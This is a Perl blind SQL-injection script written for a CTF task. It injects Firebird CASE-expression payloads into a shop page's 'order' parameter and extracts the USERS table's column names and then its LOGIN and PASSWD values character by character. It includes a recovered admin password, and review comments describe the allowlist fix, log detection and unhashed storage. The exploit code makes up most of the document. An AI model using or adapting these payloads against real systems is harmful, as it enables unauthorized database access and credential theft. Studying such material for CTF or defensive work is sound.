# Blind SQL-injection extraction script written for a CTF task (see the host
# in $url). It appends a SQL CASE expression to the shop page's `order` query
# parameter and learns one yes/no answer per HTTP request from the response.
# NOTE(review): that this works implies the server concatenates `order` into
# its SQL text (the server code is not shown here). The application-side fix
# is to map `order` onto a fixed allowlist of sortable columns, because
# identifiers in ORDER BY cannot be bound as query parameters.
# Detection: every guessed character costs one GET, so access logs show a
# burst of requests to index.php?page=shop whose `order` value contains
# `case when`, `select`, `ascii_char(` and `rdb$` names.
- use LWP::Simple;
- #username:password
- #admin:9shS3FAk
# NOTE(review): the two lines above look like the author's recorded result.
# A password recovered in readable form suggests PASSWD is stored unhashed;
# confirm against the application.
- # extract columns from USERS
# Target endpoint. The payload is appended as the value of order= and sent
# as-is; this script applies no URL encoding.
- $url="http://hackyou2014tasks.ctf.su:30080/index.php?page=shop&order=";
# Prefix of the probe. rdb$relation_fields is a Firebird system table; the
# ascii_char() chain spells "users" (117,115,101,114,115). The trailing LIKE
# is left open and is completed later with the guessed prefix.
- $fst="case when(1=(select first 1 1 from rdb\$relation_fields where lower(RDB\$RELATION_NAME)=ascii_char(117)||ascii_char(115)||ascii_char(101)||ascii_char(114)||ascii_char(115) and lower(rdb\$field_name) LIKE ";
# Suffix of the probe. ascii_char(37) is '%', turning the LIKE into a prefix
# match. The CASE then selects a one-row subquery when the condition holds
# and a two-row subquery otherwise.
# NOTE(review): presumably the two-row branch makes the page fail or render
# differently, which is what gives the true/false signal; confirm.
- $snd="||ascii_char(37) )) then (select first 1 1 from rdb\$relations) else (select first 2 1 from rdb\$relations) end";
# $b counts failed guesses; the loops compare it with the size of the
# candidate range to decide when no further character matches.
- $b=0;
- # LOGIN column part
# Recovers one column name of the USERS table, one character per outer-loop
# pass, by growing the LIKE prefix held in $fst.
# Outer loop: at most 100 character positions.
- for($j=0;$j<100;$j++){
# Inner loop: candidate character codes 97..121 (the bound is $i<122).
- for($i=97;$i<122;$i++){
# Full request URL: endpoint + probe prefix + guessed character + suffix.
- $sql=$url.$fst."ascii_char(".$i.")".$snd;
- #print "j: ".$j." i:".$i."\n";
# One HTTP GET per guess. LWP::Simple's get returns undef on failure, which
# simply fails the pattern match below.
- $html=get $sql;
# "1337" in the response body is treated as the "condition true" signal.
# NOTE(review): presumably a value shown on the normally rendered shop page;
# confirm. 37 ('%') and 95 ('_') are the LIKE wildcards and are rejected,
# although neither lies inside the 97..121 range iterated here.
- if ($html=~/1337/ && $i!=37 && $i!=95){
- print chr($i);
# Keep the confirmed character in the prefix for the next position.
- $fst.="ascii_char(".$i.")||";
- last;
- }else{
- $b++;
- }
- }
# 122-97 = 25 failed guesses means every candidate was rejected at this
# position, so the name is taken as complete.
- if($b==122-97){
- last;
- }else{
- $b=0;
- }
- }
- print "\n";
- # PASSWD column part
# Second pass over the USERS column names: $fst is reset to the bare probe
# prefix (the ascii_char() chain spells "users") and the same character-by-
# character search is repeated. $snd is reused from earlier in the script.
- $fst="case when(1=(select first 1 1 from rdb\$relation_fields where lower(RDB\$RELATION_NAME)=ascii_char(117)||ascii_char(115)||ascii_char(101)||ascii_char(114)||ascii_char(115) and lower(rdb\$field_name) LIKE ";
- $b=0;
# Outer loop: at most 100 character positions.
- for($j=0;$j<100;$j++){
# Inner loop: candidate character codes 97..121 (the bound is $i<122).
- for($i=97;$i<122;$i++){
- $sql=$url.$fst."ascii_char(".$i.")".$snd;
# One HTTP GET per guess.
- $html=get $sql;
# "1337" in the body is the "condition true" signal. Besides the LIKE
# wildcards 37 ('%') and 95 ('_'), code 108 ('l') is rejected at every
# position of this pass.
# NOTE(review): presumably 'l' is excluded so the probe does not land on the
# column found by the previous pass again; confirm.
- if ($html=~/1337/ && $i!=37 && $i!=95 && $i!=108){
- print chr($i);
# Keep the confirmed character in the prefix for the next position.
- $fst.="ascii_char(".$i.")||";
- last;
- }else{
- $b++;
- }
- }
# 25 failed guesses (122-97) at one position ends the search.
- if($b==122-97){
- last;
- }else{
- $b=0;
- }
- }
- print "\n";
- #extract data from USERS ( LOGIN,PASSWD)
# Data phase: the probe now targets the application table directly and asks
# whether any USERS.LOGIN value starts with the guessed prefix.
# Defender note: requests from this phase name the table and column in the
# `order` value, so they are visible in access logs.
- $fst="case when(1=(select first 1 1 from USERS where LOGIN LIKE ";
# Same suffix as before: '%' for a prefix match, then a one-row subquery on
# true and a two-row subquery on false.
- $snd="||ascii_char(37) )) then (select first 1 1 from rdb\$relations) else (select first 2 1 from rdb\$relations) end";
# Outer loop: at most 100 character positions.
- for($j=0;$j<100;$j++){
# Inner loop: candidate character codes 65..122 inclusive.
- for($i=65;$i<=122;$i++){
- $sql=$url.$fst."ascii_char(".$i.")".$snd;
- #print $j." ".$i."\n";
# One HTTP GET per guess.
- $html=get $sql;
# "1337" in the body is the "condition true" signal; 37 ('%') and 95 ('_')
# are LIKE wildcards and would match any character, so they are rejected.
- if ($html=~/1337/ && $i!=37 && $i!=95){
# Each recovered character is printed on its own line in this phase.
- print chr($i)."\n";
- $fst.="ascii_char(".$i.")||";
- last;
- }else{
- $b++;
- }
- }
# 123-65 = 58 failed guesses covers the whole candidate range.
- if($b==123-65){
- last;
- }else{
- $b=0;
- }
- }
- print "\n";
# Data phase for USERS.PASSWD, using the same prefix-growing search.
# NOTE(review): the value is recovered as literal characters, which suggests
# passwords are stored unhashed; confirm. Storing salted password hashes
# would limit what a read of this column discloses.
- $fst="case when(1=(select first 1 1 from USERS where PASSWD LIKE ";
# Suffix: '%' for a prefix match, then a one-row subquery on true and a
# two-row subquery on false.
- $snd="||ascii_char(37) )) then (select first 1 1 from rdb\$relations) else (select first 2 1 from rdb\$relations) end";
# Outer loop: at most 100 character positions.
- for($j=0;$j<100;$j++){
# Inner loop: candidate character codes 48..122 inclusive.
- for($i=48;$i<=122;$i++){
- $sql=$url.$fst."ascii_char(".$i.")".$snd;
- #print $j." ".$i."\n";
# One HTTP GET per guess.
- $html=get $sql;
# "1337" in the body is the "condition true" signal; 37 ('%') and 95 ('_')
# are LIKE wildcards and are rejected.
- if ($html=~/1337/ && $i!=37 && $i!=95){
# Each recovered character is printed on its own line.
- print chr($i)."\n";
- $fst.="ascii_char(".$i.")||";
- last;
- }else{
- $b++;
- }
- }
# 123-48 = 75 failed guesses covers the whole candidate range.
- if($b==123-48){
- last;
- }else{
- $b=0;
- }
- }
- print "\n";